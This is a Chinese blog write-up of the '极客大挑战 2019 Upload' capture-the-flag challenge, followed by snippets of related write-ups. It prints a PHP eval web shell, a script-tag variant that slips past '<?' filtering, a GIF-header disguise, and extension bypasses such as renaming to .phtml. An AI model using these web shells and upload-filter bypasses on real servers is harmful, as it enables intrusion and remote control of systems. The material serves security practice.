[极客大挑战 2019]Upload

最新推荐文章于 2024-07-16 17:24:37 发布
最新推荐文章于 2024-07-16 17:24:37 发布
阅读量155 收藏
点赞数
分类专栏: wp 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55234680/article/details/120771839
版权

打开题目,为文件上传

尝试上传后缀为php的木马

<?php @eval($_POST['door']); ?>

结果

Not image!

将后缀改为jpg,结果

NO! HACKER! your file included ‘<?’

将木马改为

<script language='php'>@eval($_POST['door']);</script>

再次上传,结果

Don’t lie to me, it’s not image at all!!!

添加jpg文件头,修改木马为

FFD8FF
<script language='php'>@eval($_POST['door']);</script>

上传,结果

Don’t lie to me, it’s not image at all!!!

把jpg文件头改为gif文件头

GIF8a
<script language='php'>@eval($_POST['door']);</script>

上传成功

上传文件名: a.jpg

通过抓包修改a.jpg为a.phtml

上传文件名:a.phtml

上传成功

扫描目录可以发现上传的文件在“upload”下
在这里插入图片描述
蚁剑连接即可

d0ud
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[buuoj][极客挑战 2019]Upload
qq_42250840的博客
07-12 347
知识点: 一句话木马 <script language='php'> @eval($_POST['pass']);</script> 绕过后缀名检测 常用php,php3,php4,php5,phtml,pht绕过 文件类型绕过 改为Content-Type: image/jpeg 复现: 新建a.jpg,写入一句话木马: 上传: 改后缀名: 用菜刀连接: 找到flag ...
[极客挑战 2019]Upload 1
chbeloved的博客
07-21 693
[极客挑战 2019]Upload 1 上传类题目,先上传一个一句话木马再说。 把文件后缀改成jpg php就用到了<? 那就改用script写 再用jpg上传 这都被看出来了,说明对文件内容检查,那就在文件内加个JPG89a (图片头文件欺骗) 但是不成功… 有点不死心,改成GIF89a 居然过了 说明是绕过了 接下来抓包,把jpg文件修改成phtml文件发挥作用 改第一处黄色标记那后缀phtml。然后点击go 上传成功了,访问试试。 看这结尾,一般都是upload/文件名 看来是
web buuctf [极客挑战 2019]Upload1
weixin_44214568的博客
09-04 565
1.随便上传一个东西,我上传的是一个txt文档,提示 "not image"; 2.不是图片格式,那就抓包改消息头 改为 : 上传后提示“don't lie to me,it's not image at all!" 应该是存在过滤,试试其他的格式: 改成php,提示“not php!” 改成php3,提示"not php3!" 之后又试了一下php4,也是不行, 最后试了一下phtml,提示“don't lie to me,it's not image at all!" 这样发现
文件上传漏洞(buuctf极客挑战easy upload
qq_66013948的博客
09-26 264
这个语句被过滤了,只要出现了这个语句,就会被过滤,那么我们要试着绕过这个,当然,在绕过的途中可能会遇到其他的情况,例如遇到php被过滤之类的问题,不过这是有的题目才会出现的问题了,具体的题目要具体分析,有的题目过滤的关键词是不一样的,需要利用不同的语句进行绕过。一名网安工程师,最开始学的那几个漏洞之一学就是注入类漏洞,而注入的参数可以是get /post等参数,也可以是文件;首先,打开文件后,我们就可以看到一个上传图片的一个表单。那么,我们可以试着将这个文件变为phtml格式过后试着上传一下,得到的是。
Buuctf—极客挑战练习
qq_45927819的博客
08-03 461
文章目录[极客挑战 2019]Knife 1[极客挑战 2019]Http 1[极客挑战 2019]Upload 1[极客挑战 2019]PHP 1 [极客挑战 2019]Knife 1 白给的shell 一句话木马 直接蚁剑或者菜刀连接 在根目录下得到flag [极客挑战 2019]Http 1 打开环境查看源码发现Secret.php: 访问一下: 也就是这个网页不是来自https://www.Sycsecret.com的 抓包,添加referer头,referer头就是证明你从哪
BUUCTF 之 [极客挑战 2019] Havefun(GET 传参)
两个月亮
12-29 2315
网站首页没有按钮,提示信息等等。遇到这种情况往往需要查看网页源代码或进行网站后台扫描。我们先来查看一下网页源代码(右键后点击。在地址栏中输入构造后的链接,敲击。启动靶机后,映入眼帘的是一只猫。这是一段 PHP 代码。即可获得 flag。
buuctf web 极客挑战2019 Upload
Ethan552525的博客
09-12 642
题目: 解题: 1:上传“一句话木马”文件 编辑文件a.php: <?php @eval($_POST['shell']);?> 上传后得到: Not image! 提示需要上传文件为 image。 2:修改Content-Type 上传a.php文件时,用burp suite抓包得到: 修改Content-Type为 image/gif 提示:NOT ...
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
ISCC2019个人挑战赛题目练习
05-05
【ISCC2019个人挑战赛题目练习】是一次针对网络安全技术的竞赛,旨在提升参赛者在信息安全领域的技能和实战经验。此类挑战通常涵盖多种技术领域,包括但不限于密码学、漏洞分析、网络嗅探、逆向工程、Web安全以及...
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
BUUCTF [极客挑战 2019]BabySQL
m0_49025459的博客
05-15 569
打开环境看看,这一个登录界面 尝试万能密码无果,那么我们只能正常尝试注入,先判断列数 1' order by 1# 输入之后发生报错 发现这里or被过滤掉了 ,这里不论是大写还是小写的or都被过滤了,但是在尝试双写绕过的时候成功了 username:admin' oorr '1'='1# password:123 这样我们就可以尝试又多少列了,但是我们在尝试的时候发现order,or,by都被过滤掉了,所以我们只能通过其他的方式进行测试。但是我们在测试的时候发现union,sel
Buuctf:[极客挑战 2019]Upload1
羽的博客
07-06 146
这里挺离谱的,我传什么图片上去都说是not image! 我靠!!!!! 非常难受。 看了下wp说可以传GIF,可是试了一下也不行。就很迷惑。 随后决定硬来,直接传马。 就是这样传的。
buuctf 极客挑战 babysql
SopRomeo的博客
01-17 1677
emmmmm这道题,常规注入不可行,很明显过滤了什么字符,我试了下双写,没想到可行。。 接着就直接上图吧 跟之前lovesql差不多
BUUCTF_极客挑战 2019_2
qq_45628145的博客
05-03 658
PHP 进入题目之后,提示我们存在备份文件,扫出来www.zip。 里面存在class.php、index.php、flag.php。 这些就说明这是个反序列化的题目了,分析下代码,我们需要让username=admin,而且password!=100,先序列化。 得到 O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"%Namepass...
buuctf [极客挑战 2019]BuyFlag
qq_52671379的博客
05-09 1332
buuctf [极客挑战 2019]BuyFlag
BUUCTF WEB [极客挑战 2019]BuyFlag
Y1da的博客
04-17 585
BUUCTF WEB [极客挑战 2019]BuyFlag 进入环境后在MENU中发现PAYFLAG功能,点击进入,提示 FLAG FLAG NEED YOUR 100000000 MONEY ATTENTION If you want to buy the FLAG: You must be a student from CUIT!!! You must be answer the correct password!!! Only Cuit's students can buy the FLA
网络安全防御 -- 双机热备和带宽管理综合实验
最新发布
rrl18215821889的博客
07-16 553
12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW1。13,办公区上网用户限制流量不超过100M,其中销售部人员在其基础上限制流量不超过60M,且销售部一共10人,每人限制流量不超过6M。16,外网访问内网服务器,下行流量不超过40M,DMZ中的每台服务器限制对外提供的最大下行带宽不超过20M。做负载分担模式,生产区和办公区的流量走FW1,游客区和DMZ区走FW3。配置g0/0/0ip和开启服务。办公区销售部带宽策略;
极客挑战 2019]EasySQL
09-03
EasySQL 是极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值